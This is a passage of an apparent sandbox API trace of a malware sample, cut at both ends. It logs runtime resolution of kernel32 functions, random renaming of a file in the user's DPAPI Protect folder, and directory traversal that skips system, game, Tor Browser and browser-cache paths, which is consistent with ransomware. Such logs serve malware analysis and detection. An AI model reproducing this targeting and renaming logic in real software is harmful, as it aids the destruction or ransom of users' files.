(lpString="CREATEIOCOMPLETIONPORT") returned 22 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0180.767] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0180.767] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0180.768] lstrlenA (lpString="CREATEJOBSET") returned 12 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0180.768] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0180.768] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0180.768] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0180.768] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0180.768] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0180.768] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0180.768] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0180.768] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0180.768] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0180.768] lstrlenA (lpString="CREATEPIPE") returned 10 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0180.768] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0180.768] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0180.768] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0180.768] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0180.768] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0180.768] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0180.768] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0180.768] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0180.768] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0180.769] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0180.769] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0180.769] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0180.769] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0180.769] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0180.769] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0180.769] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0180.769] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0180.769] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0180.769] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0180.769] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0180.769] lstrlenA (lpString="CREATETHREAD") returned 12 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0180.769] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0180.769] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0180.769] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0180.769] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0180.769] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0180.769] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0180.769] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0180.770] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0180.770] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0180.770] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0180.770] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0180.770] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0180.770] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0180.770] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0180.770] lstrlenA (lpString="CTRLROUTINE") returned 11 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0180.770] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0180.770] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0180.770] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0180.770] lstrlenA (lpString="DEBUGBREAK") returned 10 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0180.770] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0180.770] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0180.770] lstrlenA (lpString="DECODEPOINTER") returned 13 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0180.770] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0180.770] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0180.770] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0180.770] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0180.771] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0180.771] lstrlenA (lpString="DELETEATOM") returned 10 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0180.771] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0180.771] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0180.771] lstrlenA (lpString="DELETEFIBER") returned 11 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0180.771] lstrlenA (lpString="DELETEFILEA") returned 11 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0180.771] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0180.771] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0180.771] lstrlenA (lpString="DELETEFILEW") returned 11 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0180.771] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0180.771] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0180.771] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0180.771] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0180.771] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0180.771] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0180.771] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0180.771] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0180.771] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0180.771] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0180.771] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0180.772] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0180.772] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0180.772] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0180.772] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0180.772] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0180.772] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0180.772] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0180.772] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0180.772] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0180.772] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0180.772] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0180.772] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0180.772] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0180.772] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0180.772] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0180.772] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0180.772] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0180.772] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0180.772] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0180.773] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0180.773] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0180.773] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0180.773] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0180.773] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0180.773] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0180.773] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0180.773] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0180.773] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0180.773] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0180.773] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0180.773] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.U7XTpy") returned 126 [0180.773] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.U7XTpy.Pi03") returned 131 [0180.773] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.U7XTpy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.u7xtpy"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.U7XTpy.Pi03" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.u7xtpy.pi03"), dwFlags=0x0) returned 1 [0180.774] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.774] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.774] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.774] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28de3e80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaad91cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred.U7XTpy", cAlternateFileName="PREFER~1.U7X")) returned 0 [0180.774] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.774] CloseHandle (hObject=0x274) returned 1 [0180.775] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x541f1c70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaaf34be0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf34be0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~2")) returned 1 [0180.775] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0180.775] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0180.775] lstrcatW (in: lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="\\" | out: lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.775] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Program Files") returned 0x0 [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch=":\\Windows") returned 0x0 [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Games\\") returned 0x0 [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\All Users") returned 0x0 [0180.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", 